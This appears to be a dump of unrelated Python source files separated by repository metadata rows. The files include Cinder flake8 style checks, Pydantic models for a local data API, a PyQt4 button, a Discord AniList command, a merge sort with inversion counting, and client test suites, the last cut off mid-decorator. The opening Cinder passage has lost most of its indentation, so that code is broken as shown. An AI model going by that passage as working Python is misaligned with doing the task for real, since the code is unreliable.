if isinstance(arg, ast.Tuple):
self.add_error(arg)
return super(CheckLoggingFormatArgs, self).generic_visit(node)
class CheckOptRegistrationArgs(BaseASTChecker):
    """Verify that the registration of options is well formed.
    This class creates a check for a single opt or a list/tuple of
    opts when register_opt() or register_opts() is being called.
    """
    name = 'check_opt_registration_args'
version = '1.0'
CHECK_DESC = ('C311: Arguments being passed to register_opt/register_opts '
'must be a single option or list/tuple of options '
'respectively. Options must also end with _opt or _opts '
'respectively.')
singular_method = 'register_opt'
plural_method = 'register_opts'
register_methods = [
singular_method,
plural_method,
]
    def _find_name(self, node):
        """Return the fully qualified name of a Name or Attribute."""
if isinstance(node, ast.Name):
return node.id
elif (isinstance(node, ast.Attribute)
and isinstance(node.value, (ast.Name, ast.Attribute))):
method_name = node.attr
obj_name = self._find_name(node.value)
if obj_name is None:
return None
return obj_name + '.' + method_name
elif isinstance(node, str):
return node
else: # could be Subscript, Call or many more
return None
def _is_list_or_tuple(self, obj):
return isinstance(obj, (ast.List, ast.Tuple))
def visit_Call(self, node):
"""Look for the register_opt/register_opts calls."""
# extract the obj_name and method_name
if isinstance(node.func, ast.Attribute):
if not isinstance(node.func.value, ast.Name):
return (super(CheckOptRegistrationArgs,
self).generic_visit(node))
method_name = node.func.attr
# obj must be instance of register_opt() or register_opts()
if method_name not in self.register_methods:
return (super(CheckOptRegistrationArgs,
self).generic_visit(node))
if len(node.args) > 0:
argument_name = self._find_name(node.args[0])
if argument_name:
if (method_name == self.singular_method and
not argument_name.lower().endswith('opt')):
self.add_error(node.args[0])
elif (method_name == self.plural_method and
not argument_name.lower().endswith('opts')):
self.add_error(node.args[0])
else:
# This covers instances of register_opt()/register_opts()
# that are registering the objects directly and not
# passing in a variable referencing the options being
# registered.
if (method_name == self.singular_method and
self._is_list_or_tuple(node.args[0])):
self.add_error(node.args[0])
elif (method_name == self.plural_method and not
self._is_list_or_tuple(node.args[0])):
self.add_error(node.args[0])
return super(CheckOptRegistrationArgs, self).generic_visit(node)
@core.flake8ext
def check_datetime_now(logical_line, noqa):
if noqa:
return
msg = ("C301: Found datetime.now(). "
"Please use timeutils.utcnow() from oslo_utils.")
if 'datetime.now' in logical_line:
yield(0, msg)
@core.flake8ext
def check_no_print_statements(logical_line, filename, noqa):
# CLI and utils programs do need to use 'print()' so
# we shouldn't check those files.
if noqa:
return
if "cinder/cmd" in filename or "tools/" in filename:
return
if re.match(no_print_statements, logical_line):
msg = ("C303: print() should not be used. "
"Please use LOG.[info|error|warning|exception|debug]. "
"If print() must be used, use '# noqa' to skip this check.")
yield(0, msg)
@core.flake8ext
def check_timeutils_strtime(logical_line):
msg = ("C306: Found timeutils.strtime(). "
"Please use datetime.datetime.isoformat() or datetime.strftime()")
if 'timeutils.strtime' in logical_line:
yield(0, msg)
@core.flake8ext
def dict_constructor_with_list_copy(logical_line):
msg = ("N336: Must use a dict comprehension instead of a dict constructor "
"with a sequence of key-value pairs.")
if dict_constructor_with_list_copy_re.match(logical_line):
yield (0, msg)
@core.flake8ext
def check_timeutils_isotime(logical_line):
msg = ("C308: Found timeutils.isotime(). "
"Please use datetime.datetime.isoformat()")
if 'timeutils.isotime' in logical_line:
yield(0, msg)
@core.flake8ext
def no_test_log(logical_line, filename, noqa):
if ('cinder/tests' not in filename or noqa):
return
msg = "C309: Unit tests should not perform logging."
if logging_instance.match(logical_line):
yield (0, msg)
@core.flake8ext
def validate_assertTrue(logical_line, filename):
# Note: a comparable check cannot be implemented for
# assertFalse(), because assertFalse(None) passes.
# Therefore, assertEqual(False, value) is required to
# have the strongest test.
if 'cinder/tests/unit' not in filename:
return
if re.match(assert_True, logical_line):
msg = ("C313: Unit tests should use assertTrue(value) instead"
" of using assertEqual(True, value).")
yield(0, msg)
third_party_mock = re.compile("^import.mock")
from_third_party_mock = re.compile("^from.mock.import")
@core.flake8ext
def no_third_party_mock(logical_line):
# We should only use unittest.mock, not the third party mock library that
# was needed for py2 support.
if (re.match(third_party_mock, logical_line) or
re.match(from_third_party_mock, logical_line)):
msg = ('C337: Unit tests should use the standard library "mock" '
'module, not the third party mock lib.')
yield(0, msg)
| 36.275064
| 79
| 0.638013
|
5aeb136361b33cf15c31e98429e70ac5071ad578
| 4,725
|
py
|
Python
|
local_data_api/models.py
|
Apoalex92/local-data-api
|
19e9274c20b9eaabc4bc619a0aa75c9a7fa9020b
|
[
"MIT"
] | null | null | null |
local_data_api/models.py
|
Apoalex92/local-data-api
|
19e9274c20b9eaabc4bc619a0aa75c9a7fa9020b
|
[
"MIT"
] | null | null | null |
local_data_api/models.py
|
Apoalex92/local-data-api
|
19e9274c20b9eaabc4bc619a0aa75c9a7fa9020b
|
[
"MIT"
] | null | null | null |
from __future__ import annotations
from base64 import b64encode
from datetime import date, datetime, time
from decimal import Decimal
from enum import Enum
from typing import Any, Callable, Dict, List, Optional, Union
from pydantic import BaseModel
from pydantic import Field as Field_
TYPE_HINT_TO_CONVERTER: Dict[str, Callable[[Any], Any]] = {
'DECIMAL': Decimal,
'TIMESTAMP': datetime.fromisoformat,
'TIME': time.fromisoformat,
'DATE': date.fromisoformat,
}
class Field(BaseModel):
blobValue: Optional[str] # Type: Base64-encoded binary data object
booleanValue: Optional[bool]
doubleValue: Optional[float]
isNull: Optional[bool]
longValue: Optional[int]
stringValue: Optional[str]
@classmethod
def from_value(cls, value: Any) -> Field:
if isinstance(value, bool):
return cls(booleanValue=value)
elif isinstance(value, str):
return cls(stringValue=value)
elif isinstance(value, int):
return cls(longValue=value)
elif isinstance(value, float):
return cls(doubleValue=value)
elif isinstance(value, bytes):
return cls(blobValue=b64encode(value))
elif value is None:
return cls(isNull=True)
elif type(value).__name__.endswith('UUID'):
return cls(stringValue=str(value))
elif type(value).__name__.endswith('PGobject'):
return cls(stringValue=str(value))
elif type(value).__name__.endswith('BigInteger'):
return cls(longValue=int(str(value)))
else:
raise Exception(f'unsupported type {type(value)}: {value} ')
class SqlParameter(BaseModel):
name: str
value: Field
type_hint: Optional[str] = Field_(None, alias='typeHint')
@property
def valid_value(self: SqlParameter) -> Union[Union[None, Decimal, datetime], Any]:
for key, value in self.value.dict(exclude_unset=True).items():
if key == 'isNull' and value:
return None
if key == 'stringValue' and self.type_hint:
TYPE_HINT_TO_CONVERTER[self.type_hint](value) # only validation
return value
return None
class ExecuteSqlRequest(BaseModel):
awsSecretStoreArn: str
dbClusterOrInstanceArn: str
sqlStatements: str
database: Optional[str]
schema_: Optional[str] = Field_(None, alias='schema')
class ExecuteStatementRequests(BaseModel):
resourceArn: str
secretArn: str
sql: str
database: Optional[str]
continueAfterTimeout: Optional[bool]
includeResultMetadata: bool = False
parameters: Optional[List[SqlParameter]]
schema_: Optional[str] = Field_(None, alias='schema')
transactionId: Optional[str]
class ColumnMetadata(BaseModel):
arrayBaseColumnType: Optional[int]
isAutoIncrement: Optional[bool]
isCaseSensitive: Optional[bool]
isCurrency: Optional[bool]
isSigned: Optional[bool]
label: Optional[str]
name: Optional[str]
nullable: Optional[int]
precision: Optional[int]
scale: Optional[int]
schema_: Optional[str] = Field_(None, alias='schema')
tableName: Optional[str]
type: Optional[int]
typeName: Optional[str]
class ExecuteStatementResponse(BaseModel):
numberOfRecordsUpdated: int
generatedFields: Optional[List[Field]]
records: Optional[List[List[Field]]]
columnMetadata: Optional[List[ColumnMetadata]]
class BeginTransactionRequest(BaseModel):
resourceArn: str
secretArn: str
schema_: Optional[str] = Field_(None, alias='schema')
database: Optional[str]
class BeginTransactionResponse(BaseModel):
transactionId: str
class CommitTransactionRequest(BaseModel):
resourceArn: str
secretArn: str
transactionId: str
class TransactionStatus(Enum):
transaction_committed = 'Transaction Committed'
rollback_complete = 'Rollback Complete'
class CommitTransactionResponse(BaseModel):
transactionStatus: TransactionStatus
class RollbackTransactionRequest(BaseModel):
resourceArn: str
secretArn: str
transactionId: str
class RollbackTransactionResponse(BaseModel):
transactionStatus: TransactionStatus
class BatchExecuteStatementRequests(BaseModel):
resourceArn: str
secretArn: str
sql: str
database: Optional[str]
continueAfterTimeout: Optional[bool]
includeResultMetadata: Optional[bool]
parameterSets: Optional[List[List[SqlParameter]]]
schema_: Optional[str] = Field_(None, alias='schema')
transactionId: Optional[str]
class UpdateResult(BaseModel):
generatedFields: List[Field]
class BatchExecuteStatementResponse(BaseModel):
updateResults: List[UpdateResult]
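# A short usage sketch (invented values, assuming the models above) of how
# Field.from_value() wraps a Python value and how SqlParameter.valid_value
# unwraps it again, validating against the optional typeHint on the way.
def _example_sql_parameter() -> None:
    param = SqlParameter(name='id', value=Field.from_value(3))
    assert param.valid_value == 3  # longValue round-trips unchanged
    ts = SqlParameter(
        name='created',
        value=Field.from_value('2020-01-02T03:04:05'),
        typeHint='TIMESTAMP',
    )
    # the TIMESTAMP hint is only validated; the raw string is still returned
    assert ts.valid_value == '2020-01-02T03:04:05'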
| 28.293413
| 86
| 0.700741
|
1db6bc1256dbdab53489d47cf4851b977810125b
| 1,656
|
py
|
Python
|
kunquat/tracker/ui/views/sheet/replacebutton.py
|
cyberixae/kunquat
|
06ae72b2c1519686cc510ce887d9d45a5c3fa3a3
|
[
"CC0-1.0"
] | null | null | null |
kunquat/tracker/ui/views/sheet/replacebutton.py
|
cyberixae/kunquat
|
06ae72b2c1519686cc510ce887d9d45a5c3fa3a3
|
[
"CC0-1.0"
] | null | null | null |
kunquat/tracker/ui/views/sheet/replacebutton.py
|
cyberixae/kunquat
|
06ae72b2c1519686cc510ce887d9d45a5c3fa3a3
|
[
"CC0-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Author: Tomi Jylhä-Ollila, Finland 2014
#
# This file is part of Kunquat.
#
# CC0 1.0 Universal, http://creativecommons.org/publicdomain/zero/1.0/
#
# To the extent possible under law, Kunquat Affirmers have waived all
# copyright and related or neighboring rights to Kunquat.
#
from PyQt4.QtCore import *
from PyQt4.QtGui import *
class ReplaceButton(QToolButton):
def __init__(self):
QToolButton.__init__(self)
self._ui_model = None
self._updater = None
self._sheet_manager = None
self.setCheckable(True)
self.setText('Replace')
self.setToolTip('Replace (Insert)')
def set_ui_model(self, ui_model):
self._ui_model = ui_model
self._updater = ui_model.get_updater()
self._updater.register_updater(self._perform_updates)
self._sheet_manager = ui_model.get_sheet_manager()
icon_bank = self._ui_model.get_icon_bank()
icon_path = icon_bank.get_icon_path('replace')
icon = QIcon(icon_path)
self.setIcon(icon)
QObject.connect(self, SIGNAL('clicked()'), self._clicked)
def unregister_updaters(self):
self._updater.unregister_updater(self._perform_updates)
def _perform_updates(self, signals):
if 'signal_replace_mode' in signals:
self._update_checked()
def _update_checked(self):
old_block = self.blockSignals(True)
is_checked = self._sheet_manager.get_replace_mode()
self.setChecked(is_checked)
self.blockSignals(old_block)
def _clicked(self):
self._sheet_manager.set_replace_mode(self.isChecked())
| 27.6
| 70
| 0.682367
|
e247eef10ee10ab97e46d7055b02b982ce1f2017
| 3,096
|
py
|
Python
|
modules/disabled/api_anilist.py
|
Kubinyete/navibot
|
89526dcbab322aa135a7ee517d2c0f454b4550be
|
[
"MIT"
] | null | null | null |
modules/disabled/api_anilist.py
|
Kubinyete/navibot
|
89526dcbab322aa135a7ee517d2c0f454b4550be
|
[
"MIT"
] | null | null | null |
modules/disabled/api_anilist.py
|
Kubinyete/navibot
|
89526dcbab322aa135a7ee517d2c0f454b4550be
|
[
"MIT"
] | null | null | null |
import io
from navibot.client import BotCommand, Slider
from navibot.errors import CommandError
from libs.anilist import AniListApi
class CAnilist(BotCommand):
def __init__(self, bot):
super().__init__(
bot,
name = "anilist",
aliases = ['anl'],
            description = "Exibe um Slider com os resultados de uma pesquisa por personagens utilizando `--character`.",
usage = "[-c|--character] [busca...] [--page=1]"
)
self.api = AniListApi(self.bot.get_http_session())
async def run(self, message, args, flags):
if 'character' in flags or 'c' in flags:
try:
page = flags.get('page', 1)
if type(page) is str:
page = int(page)
if page <= 0:
page = 1
except ValueError:
                raise CommandError("É preciso informar um número válido.")
characters = await self.api.search_characters(' '.join(args), page=page, limit=20)
if characters:
items = []
for c in characters:
embed = self.create_response_embed(message)
embed.title = f"{c['name']['full']}" if not c['name'].get('native', False) else f"{c['name']['full']} ({c['name']['native']})"
embed.description = self.format_anilist_description(c['description'])
embed.set_thumbnail(url=c['image']['large'])
embed.add_field(name='Favourites', value=f":heart: {c['favourites']}")
items.append(embed)
return Slider(
self.bot,
message,
items
)
else:
                return ':information_source: Não foi encontrado nenhum personagem.'
else:
return self.get_usage_embed(message)
@staticmethod
def format_anilist_description(description):
if description and len(description) > 0:
spoiler = False
ignore_next = False
fdes = io.StringIO()
for i in range(len(description)):
c = description[i]
cnext = description[i + 1] if i + 1 < len(description) else ''
if fdes.tell() >= 2043:
if spoiler:
fdes.write("...||")
else:
fdes.write("...")
break
elif ignore_next:
ignore_next = False
elif c == "~" and cnext == "!" and not spoiler:
spoiler = True
ignore_next = True
fdes.write("||")
elif c == "!" and cnext == "~" and spoiler:
spoiler = False
ignore_next = True
fdes.write("||")
else:
fdes.write(c)
return fdes.getvalue()
else:
return "Nenhuma descrição está disponível."
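# A quick self-check (invented text, not part of the original module) that AniList
# "~!...!~" spoiler markers are converted into Discord "||...||" spoilers.
def _example_spoiler_conversion() -> None:
    assert CAnilist.format_anilist_description("Hello ~!secret!~") == "Hello ||secret||"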
| 34.786517
| 146
| 0.476421
|
4288a9929c057a4c012430e03bf585ab28ccbd91
| 2,236
|
py
|
Python
|
Course_1/mergesort_countinv.py
|
julesbertrand/Stanford-alg
|
068a76d3b3108df6fb09136fbfe373648bbfbe90
|
[
"MIT"
] | null | null | null |
Course_1/mergesort_countinv.py
|
julesbertrand/Stanford-alg
|
068a76d3b3108df6fb09136fbfe373648bbfbe90
|
[
"MIT"
] | null | null | null |
Course_1/mergesort_countinv.py
|
julesbertrand/Stanford-alg
|
068a76d3b3108df6fb09136fbfe373648bbfbe90
|
[
"MIT"
] | null | null | null |
"""
### Merge sort
Complexity:
- $6n$ operations per level
- $\log_2(n)$ recursive calls
- Total in time: $6n \log_2(n) + 6n = O(n\log(n))$
- In memory: $O(n)$, since the merge is not done in place
### Inversions algorithm
Complexity:
same as merge sort, $O(n\log(n))$ in time and $O(n)$ in memory
"""
import numpy as np
def merge_sort(A):
def merge_sort_(A, l, r):
if l < r:
m = (l + r - 1) // 2
merge_sort_(A, l, m)
merge_sort_(A, m + 1, r)
combine(A, l, m, r)
def combine(A, l, m, r):
n_l = m - l + 1
n_r = r - m
L = A[l : m + 1]
R = A[m + 1 : r + 1]
i, j, k = 0, 0, l
while i < n_l and j < n_r:
if L[i] <= R[j]:
A[k] = L[i]
i += 1
else:
A[k] = R[j]
j += 1
k += 1
while i < n_l:
A[k] = L[i]
k += 1
i += 1
while j < n_r:
A[k] = R[j]
k += 1
j += 1
return merge_sort_(A, 0, len(A) - 1)
def count_inversions(A):
def sort_and_count_inversions(A, l, r):
if r <= l:
return 0
else:
m = (l + r - 1) // 2
x = sort_and_count_inversions(A, l, m)
y = sort_and_count_inversions(A, m + 1, r)
z = combine_and_count_inv_split(A, l, m, r)
return x + y + z
def combine_and_count_inv_split(A, l, m, r):
n_l = m - l + 1
n_r = r - m
L = A[l : m + 1]
R = A[m + 1 : r + 1]
i, j, k = 0, 0, l
count = 0
while i < n_l and j < n_r:
if L[i] <= R[j]:
A[k] = L[i]
i += 1
else:
A[k] = R[j]
count += n_l - i
j += 1
k += 1
while i < n_l:
A[k] = L[i]
k += 1
i += 1
while j < n_r:
A[k] = R[j]
k += 1
j += 1
return count
return sort_and_count_inversions(A, 0, len(A) - 1)
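# A small sanity check (example values, not the assignment data from
# countinv.txt): the list below contains 6 inverted pairs, and the call
# also leaves it merge-sorted in place.
def _example_count_inversions() -> None:
    A = [1, 23, 5, 2, 4, 6]
    assert count_inversions(A) == 6
    assert A == [1, 2, 4, 5, 6, 23]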
if __name__ == "__main__":
A = np.loadtxt("./Course_1/countinv.txt").tolist()
# A = [1, 23, 5, 2, 4, 6]
count_inversions(A)
| 23.536842
| 62
| 0.386852
|
6addd0ec6af996106ff183a132355ee076aceabf
| 8,928
|
py
|
Python
|
test/test_client.py
|
rowenarono95/radiant-mlhub
|
c79629c7b8cd90950224a6424091e8b23c07ec12
|
[
"Apache-2.0"
] | null | null | null |
test/test_client.py
|
rowenarono95/radiant-mlhub
|
c79629c7b8cd90950224a6424091e8b23c07ec12
|
[
"Apache-2.0"
] | null | null | null |
test/test_client.py
|
rowenarono95/radiant-mlhub
|
c79629c7b8cd90950224a6424091e8b23c07ec12
|
[
"Apache-2.0"
] | null | null | null |
import os
from radiant_mlhub.session import Session
from urllib.parse import urljoin, parse_qs, urlsplit
import pytest
import radiant_mlhub.client
from radiant_mlhub.exceptions import EntityDoesNotExist, MLHubException, AuthenticationError
class TestClient:
@pytest.mark.vcr
def test_collection_does_not_exist(self):
collection_id = 'no_collection'
with pytest.raises(EntityDoesNotExist) as excinfo:
radiant_mlhub.client.get_collection(collection_id)
assert f'Collection "{collection_id}" does not exist.' == str(excinfo.value)
@pytest.mark.vcr
def test_dataset_does_not_exist(self):
dataset_id = 'no_dataset'
with pytest.raises(EntityDoesNotExist) as excinfo:
radiant_mlhub.client.get_dataset(dataset_id)
assert f'Dataset "{dataset_id}" does not exist.' == str(excinfo.value)
def test_internal_server_dataset_error(self, requests_mock):
# Mock this using requests-mock instead of VCRPY so we can simulate a 500 response
dataset_id = 'internal_server_error'
url = f'https://api.radiant.earth/mlhub/v1/datasets/{dataset_id}'
requests_mock.get(url, status_code=500, reason='Internal Server Error')
with pytest.raises(MLHubException):
radiant_mlhub.client.get_dataset(dataset_id)
def test_internal_server_collections_error(self, requests_mock):
collection_id = 'internal_error'
endpoint = f'https://api.radiant.earth/mlhub/v1/collections/{collection_id}'
requests_mock.get(endpoint, status_code=500, reason='Internal Server Error')
with pytest.raises(MLHubException) as excinfo:
radiant_mlhub.client.get_collection(collection_id)
assert 'Internal Server Error' in str(excinfo.value)
@pytest.mark.vcr
def test_list_collection_items(self):
items = list(radiant_mlhub.client.list_collection_items('ref_african_crops_kenya_02_source', limit=40))
assert len(items) == 40
assert 'assets' in items[0]
assert items[0]['id'] == 'ref_african_crops_kenya_02_tile_02_20190721'
# Test pagination break
items = list(radiant_mlhub.client.list_collection_items('ref_african_crops_kenya_02_source', limit=100))
assert len(items) == 52
@pytest.mark.vcr
def test_get_collection_item(self):
item = radiant_mlhub.client.get_collection_item(
'ref_african_crops_kenya_02_source',
'ref_african_crops_kenya_02_tile_02_20190721'
)
assert item['id'] == 'ref_african_crops_kenya_02_tile_02_20190721'
@pytest.mark.vcr
def test_get_collection_item_errors(self):
# Mock 404 response for collection and/or item not existing
collection_id = 'no_collection'
item_id = 'item_id'
with pytest.raises(EntityDoesNotExist):
radiant_mlhub.client.get_collection_item(
collection_id,
item_id
)
@pytest.mark.vcr
def test_download_archive(self, tmp_path):
# Set CWD to temp path
os.chdir(tmp_path)
# Let output_dir default to CWD
output_path = radiant_mlhub.client.download_archive('ref_african_crops_kenya_02_labels')
assert output_path == tmp_path / 'ref_african_crops_kenya_02_labels.tar.gz'
assert output_path.exists()
@pytest.mark.vcr
def test_download_archive_does_not_exist(self, tmp_path):
archive_id = 'no_archive'
with pytest.raises(EntityDoesNotExist) as excinfo:
radiant_mlhub.client.download_archive(archive_id, output_dir=tmp_path)
assert f'Archive "{archive_id}" does not exist and may still be generating. ' \
'Please try again later.' == str(excinfo.value)
def test_download_archive_only_accepts_dir(self, tmp_path):
# Test error if file path is provided
tmp_file = tmp_path / 'test.txt'
tmp_file.touch()
with pytest.raises(ValueError):
radiant_mlhub.client.download_archive('_', output_dir=tmp_file)
@pytest.mark.vcr
def test_skip_download_exists(self, tmp_path):
collection_id = 'ref_african_crops_kenya_02_labels'
expected_output_path = tmp_path / f'{collection_id}.tar.gz'
expected_output_path.touch(exist_ok=True)
original_size = expected_output_path.stat().st_size
# Test if_exists = 'skip' (default)
output_path = radiant_mlhub.client.download_archive(
collection_id,
output_dir=tmp_path,
if_exists='skip'
)
assert output_path.stat().st_size == original_size
@pytest.mark.vcr
def test_overwrite_download_exists(self, tmp_path):
collection_id = 'ref_african_crops_kenya_02_labels'
expected_output_path = tmp_path / f'{collection_id}.tar.gz'
expected_output_path.touch(exist_ok=True)
original_size = expected_output_path.stat().st_size
# Test overwrite
output_path = radiant_mlhub.client.download_archive(
collection_id,
output_dir=tmp_path,
if_exists='overwrite'
)
assert output_path.stat().st_size > original_size
class TestAnonymousClient:
@pytest.fixture(scope='function', autouse=True)
def mock_profile(self):
pass
def test_list_datasets_anonymously_has_no_key(self, requests_mock):
url = urljoin(Session.ROOT_URL, 'datasets')
# Don't really care about the response here, since we're just interested in the request
# parameters. We test that this gives a valid response in a different test
requests_mock.get(url, json=[])
_ = radiant_mlhub.client.list_datasets(profile="__anonymous__")
history = requests_mock.request_history
actual_url = history[0].url
qs = parse_qs(urlsplit(actual_url).query)
assert "key" not in qs
@pytest.mark.vcr
def test_list_datasets_anonymously_works(self):
datasets = radiant_mlhub.client.list_datasets(profile="__anonymous__")
assert len(datasets) > 0
def test_list_collections_anonymously_has_no_key(self, requests_mock):
url = urljoin(Session.ROOT_URL, 'collections')
# Don't really care about the response here, since we're just interested in the request
# parameters. We test that this gives a valid response in a different test
requests_mock.get(url, json={"collections": []})
_ = radiant_mlhub.client.list_collections(profile="__anonymous__")
history = requests_mock.request_history
actual_url = history[0].url
qs = parse_qs(urlsplit(actual_url).query)
assert "key" not in qs
@pytest.mark.vcr
def test_list_collections_anonymously_works(self):
collections = radiant_mlhub.client.list_collections(profile="__anonymous__")
assert len(collections) > 0
def test_get_collection_anonymously_has_no_key(self, requests_mock):
collection_id = 'bigearthnet_v1_source'
url = urljoin(Session.ROOT_URL, f'collections/{collection_id}')
# Don't really care about the response here, since we're just interested in the request
# parameters. We test that this gives a valid response in a different test
requests_mock.get(url, json={})
_ = radiant_mlhub.client.get_collection(collection_id, profile="__anonymous__")
history = requests_mock.request_history
actual_url = history[0].url
qs = parse_qs(urlsplit(actual_url).query)
assert "key" not in qs
@pytest.mark.vcr
def test_get_collection_anonymously_works(self):
collection_id = 'bigearthnet_v1_source'
collection = radiant_mlhub.client.get_collection(collection_id, profile="__anonymous__")
assert isinstance(collection, dict)
def test_list_collection_items_anonymously_has_no_key(self, requests_mock):
collection_id = "bigearthnet_v1_source"
url = urljoin(Session.ROOT_URL, f'collections/{collection_id}/items')
# Don't really care about the response here, since we're just interested in the request
# parameters. We test that this gives a valid response in a different test
requests_mock.get(url, json={"features": []})
_ = list(radiant_mlhub.client.list_collection_items(collection_id, profile="__anonymous__"))
history = requests_mock.request_history
actual_url = history[0].url
qs = parse_qs(urlsplit(actual_url).query)
assert "key" not in qs
@pytest.mark.vcr
def test_list_collection_items_anonymously_does_not_work(self):
collection_id = "bigearthnet_v1_source"
with pytest.raises(AuthenticationError) as excinfo:
_ = list(radiant_mlhub.client.list_collection_items(collection_id, profile="__anonymous__"))
assert "No API key provided" in str(excinfo.value)
| 38.317597
| 112
| 0.699933
|
d964e44cb575cab78593d5119a02ad97491338db
| 72,266
|
py
|
Python
|
azure-iot-device/tests/iothub/shared_client_tests.py
|
jimbobbennett/azure-iot-sdk-python
|
06cee421761d80b9d7d761bd23a7c6876bf7fdd3
|
[
"MIT"
] | null | null | null |
azure-iot-device/tests/iothub/shared_client_tests.py
|
jimbobbennett/azure-iot-sdk-python
|
06cee421761d80b9d7d761bd23a7c6876bf7fdd3
|
[
"MIT"
] | null | null | null |
azure-iot-device/tests/iothub/shared_client_tests.py
|
jimbobbennett/azure-iot-sdk-python
|
06cee421761d80b9d7d761bd23a7c6876bf7fdd3
|
[
"MIT"
] | null | null | null |
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""This module contains tests that are shared between sync/async clients
i.e. tests for things defined in abstract clients"""
import pytest
import logging
import os
import io
import six
import socks
import time
import six.moves.urllib as urllib
from azure.iot.device.common import auth
from azure.iot.device.common.auth import sastoken as st
from azure.iot.device.common.auth import connection_string as cs
from azure.iot.device.iothub.pipeline import IoTHubPipelineConfig
from azure.iot.device.common.pipeline.config import DEFAULT_KEEPALIVE
from azure.iot.device.iothub.abstract_clients import (
RECEIVE_TYPE_NONE_SET,
RECEIVE_TYPE_HANDLER,
RECEIVE_TYPE_API,
)
from azure.iot.device.iothub import edge_hsm
from azure.iot.device import ProxyOptions
from azure.iot.device import exceptions as client_exceptions
logging.basicConfig(level=logging.DEBUG)
####################
# HELPER FUNCTIONS #
####################
def token_parser(token_str):
    """Helper function that parses a token string for individual values."""
token_map = {}
kv_string = token_str.split(" ")[1]
kv_pairs = kv_string.split("&")
for kv in kv_pairs:
t = kv.split("=")
token_map[t[0]] = t[1]
return token_map
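# For example (invented token values, not a real credential):
#     token_parser("SharedAccessSignature sr=my-hub%2Fdevices%2Fdev1&sig=abc&se=1600000000")
#     # -> {"sr": "my-hub%2Fdevices%2Fdev1", "sig": "abc", "se": "1600000000"}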
################################
# SHARED DEVICE + MODULE TESTS #
################################
class SharedIoTHubClientInstantiationTests(object):
@pytest.mark.it(
"Stores the MQTTPipeline from the 'mqtt_pipeline' parameter in the '_mqtt_pipeline' attribute"
)
def test_mqtt_pipeline_attribute(self, client_class, mqtt_pipeline, http_pipeline):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._mqtt_pipeline is mqtt_pipeline
@pytest.mark.it(
"Stores the HTTPPipeline from the 'http_pipeline' parameter in the '_http_pipeline' attribute"
)
def test_sets_http_pipeline_attribute(self, client_class, mqtt_pipeline, http_pipeline):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._http_pipeline is http_pipeline
@pytest.mark.it("Sets on_connected handler in the MQTTPipeline")
def test_sets_on_connected_handler_in_pipeline(
self, client_class, mqtt_pipeline, http_pipeline
):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._mqtt_pipeline.on_connected is not None
assert client._mqtt_pipeline.on_connected == client._on_connected
@pytest.mark.it("Sets on_disconnected handler in the MQTTPipeline")
def test_sets_on_disconnected_handler_in_pipeline(
self, client_class, mqtt_pipeline, http_pipeline
):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._mqtt_pipeline.on_disconnected is not None
assert client._mqtt_pipeline.on_disconnected == client._on_disconnected
@pytest.mark.it("Sets on_method_request_received handler in the MQTTPipeline")
def test_sets_on_method_request_received_handler_in_pipleline(
self, client_class, mqtt_pipeline, http_pipeline
):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._mqtt_pipeline.on_method_request_received is not None
assert (
client._mqtt_pipeline.on_method_request_received
== client._inbox_manager.route_method_request
)
@pytest.mark.it("Sets the Receive Mode/Type for the client as yet-unchosen")
def test_initial_receive_mode(self, client_class, mqtt_pipeline, http_pipeline):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._receive_type == RECEIVE_TYPE_NONE_SET
@pytest.mark.usefixtures("mock_mqtt_pipeline_init", "mock_http_pipeline_init")
class SharedIoTHubClientCreateMethodUserOptionTests(object):
@pytest.fixture
def option_test_required_patching(self, mocker):
"""Override this fixture in a subclass if unique patching is required"""
pass
@pytest.mark.it(
"Sets the 'product_info' user option parameter on the PipelineConfig, if provided"
)
def test_product_info_option(
self,
option_test_required_patching,
client_create_method,
create_method_args,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
product_info = "MyProductInfo"
client_create_method(*create_method_args, product_info=product_info)
# Get configuration object, and ensure it was used for both protocol pipelines
assert mock_mqtt_pipeline_init.call_count == 1
config = mock_mqtt_pipeline_init.call_args[0][0]
assert isinstance(config, IoTHubPipelineConfig)
assert config == mock_http_pipeline_init.call_args[0][0]
assert config.product_info == product_info
@pytest.mark.it(
"Sets the 'websockets' user option parameter on the PipelineConfig, if provided"
)
def test_websockets_option(
self,
option_test_required_patching,
client_create_method,
create_method_args,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
client_create_method(*create_method_args, websockets=True)
# Get configuration object, and ensure it was used for both protocol pipelines
assert mock_mqtt_pipeline_init.call_count == 1
config = mock_mqtt_pipeline_init.call_args[0][0]
assert isinstance(config, IoTHubPipelineConfig)
assert config == mock_http_pipeline_init.call_args[0][0]
assert config.websockets
    # TODO: Show that input in the wrong format is formatted to the correct one. This test exists
    # in the IoTHubPipelineConfig object already, but we do not currently show that this is
    # reflected at the API level.
@pytest.mark.it("Sets the 'cipher' user option parameter on the PipelineConfig, if provided")
def test_cipher_option(
self,
option_test_required_patching,
client_create_method,
create_method_args,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
cipher = "DHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA:ECDHE-ECDSA-AES128-GCM-SHA256"
client_create_method(*create_method_args, cipher=cipher)
# Get configuration object, and ensure it was used for both protocol pipelines
assert mock_mqtt_pipeline_init.call_count == 1
config = mock_mqtt_pipeline_init.call_args[0][0]
assert isinstance(config, IoTHubPipelineConfig)
assert config == mock_http_pipeline_init.call_args[0][0]
assert config.cipher == cipher
@pytest.mark.it(
"Sets the 'server_verification_cert' user option parameter on the PipelineConfig, if provided"
)
def test_server_verification_cert_option(
self,
option_test_required_patching,
client_create_method,
create_method_args,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
server_verification_cert = "fake_server_verification_cert"
client_create_method(*create_method_args, server_verification_cert=server_verification_cert)
# Get configuration object, and ensure it was used for both protocol pipelines
assert mock_mqtt_pipeline_init.call_count == 1
config = mock_mqtt_pipeline_init.call_args[0][0]
assert isinstance(config, IoTHubPipelineConfig)
assert config == mock_http_pipeline_init.call_args[0][0]
assert config.server_verification_cert == server_verification_cert
@pytest.mark.it(
